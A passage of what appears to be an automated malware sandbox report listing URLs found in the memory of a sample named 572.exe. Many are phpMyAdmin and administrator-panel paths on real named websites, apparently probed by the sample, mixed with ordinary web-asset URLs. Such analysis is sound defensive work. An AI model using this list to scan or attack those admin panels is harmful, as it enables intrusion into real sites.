                Source: 572.exe, 00000009.00000003.4304769446.0000000040305000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-content/themes/voice/js/html5.js
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-content/themes/voice/js/imagesloaded.pkgd.min.js?ver=1.5.2
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-content/themes/voice/js/jquery.fitvids.js?ver=1.5.2
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-content/themes/voice/js/jquery.matchHeight.js?ver=1.5.2
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-content/themes/voice/js/jquery.sidr.min.js?ver=1.5.2
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-content/themes/voice/js/owl.carousel.min.js?ver=1.5.2
                Source: 572.exe, 00000009.00000003.4359155802.0000000040306000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040305000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-content/themes/voice/style.css?ver=1.5.2
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-content/uploads/2024/01/Artboard-1-100.jpg
                Source: 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-content/uploads/2024/01/mobilsam-favicon.png
                Source: 572.exe, 00000009.00000003.4359155802.0000000040306000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040305000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                Source: 572.exe, 00000009.00000003.4359155802.0000000040306000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040305000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
                Source: 572.exe, 00000009.00000003.4359155802.0000000040306000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040305000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.4.3
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/wp-json/
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobilsam.com/xmlrpc.php?rsd
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mojadovera.sk/administrator/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mojadovera.sk/administrator/F
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mojadovera.sk/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mojadovera.sk/phpmyadmin/m:220/
                Source: 572.exe, 00000009.00000003.4327514305.000000004D9AE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://money-farm.cc/administrator/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://money-farm.cc/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4439315683.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://money-farm.cc/phpmyadmin/T
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://multiideas.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://multiideas.com/phpmyadmin/A
                Source: 572.exe, 00000009.00000003.4513550067.000000004E073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mw.redsa.net/administrator/
                Source: 572.exe, 00000009.00000003.4546365410.000000004DF39000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mw.redsa.net/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mypartnerportal.zoom.us/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mypartnerportal.zoom.us/?sso=21&RelayState=/pages/38/home
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naukrigulf.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naukrigulf.com/phpmyadmin/22
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netcsomagom.dpd.hu/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netcsomagom.dpd.hu/phpmyadmin/&2I
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netcsomagom.dpd.hu/phpmyadmin/12&
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netizion.com
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netizion.com/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4337138614.000000004DADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netizion.com/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netizion.com/administrator/C
                Source: 572.exe, 00000009.00000003.4402104725.0000000063F8F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netizion.com/data/assets/logo/favicon.png
                Source: 572.exe, 00000009.00000003.4402104725.0000000063F8F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netizion.com/data/assets/logo/netizion-URL.png
                Source: 572.exe, 00000009.00000003.4402104725.0000000063F8F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netizion.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://news.zoom.us/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ngoalongvn.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ngoalongvn.com/phpmyadmin/J
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nl.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://no.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nossoplayer.me/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4315918557.000000004E1A9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4337138614.000000004DAFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nuevopacto.runacode.com/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nuevopacto.runacode.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4199132686.0000000039116000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.0000000039116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oferta.senasofiaplus.edu.co/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oferta.senasofiaplus.edu.co/administrator/$?
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oferta.senasofiaplus.edu.co/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oferta.senasofiaplus.edu.co/phpmyadmin/o22
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://on.zoom.us/
                Source: explorer.exe, 00000002.00000000.2127512556.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ov.edesur.com.do/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ov.edesur.com.do/phpmyadmin/_
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4533691780.00000000056FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pan.baidu.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pan.baidu.com/phpmyadmin/B
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pan.baidu.com/phpmyadmin/cc21$
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://partner.steamgames.com/steamdirect
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://partner.zoom.us/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://partner.zoom.us/partner-locator/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://partner.zoom.us/solutions/
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastefly.com
                Source: 572.exe, 00000009.00000003.4304769446.00000000401DC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paywithmybank.com/
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://phonandroid.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://phonandroid.com/phpmyadmin/8
                Source: 572.exe, 00000009.00000003.4003323359.00000000390E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pl.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: explorer.exe, 00000002.00000000.2127512556.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://preproduction-dot-snap-profile-manager.snapchat.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://profile-preprod.snapchat.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://profile.snapchat.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://profile.softserve-local-prod.snap-dev.net
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://profit.io/profitcast
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/about/IMVU_MediaKit_2014.pdf
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/avatar/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/catalog/web_help_center.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/catalog/web_safety_tips01.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/creatorlanding/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/groups/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/jobs/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/next/download/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/next/earn_credits/featured/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/next/policyhub/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/people/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/rooms/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/shop/
                Source: 572.exe, 00000009.00000003.4337138614.000000004DAD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.secure.imvu.com
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.secure.imvu.com/next/?source=banner
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.secure.imvu.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.secure.imvu.com/store/
                Source: 572.exe, 00000009.00000003.4199132686.0000000039116000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.0000000039116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pxndx-mcr.boletia.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pxndx-mcr.boletia.com/phpmyadmin/
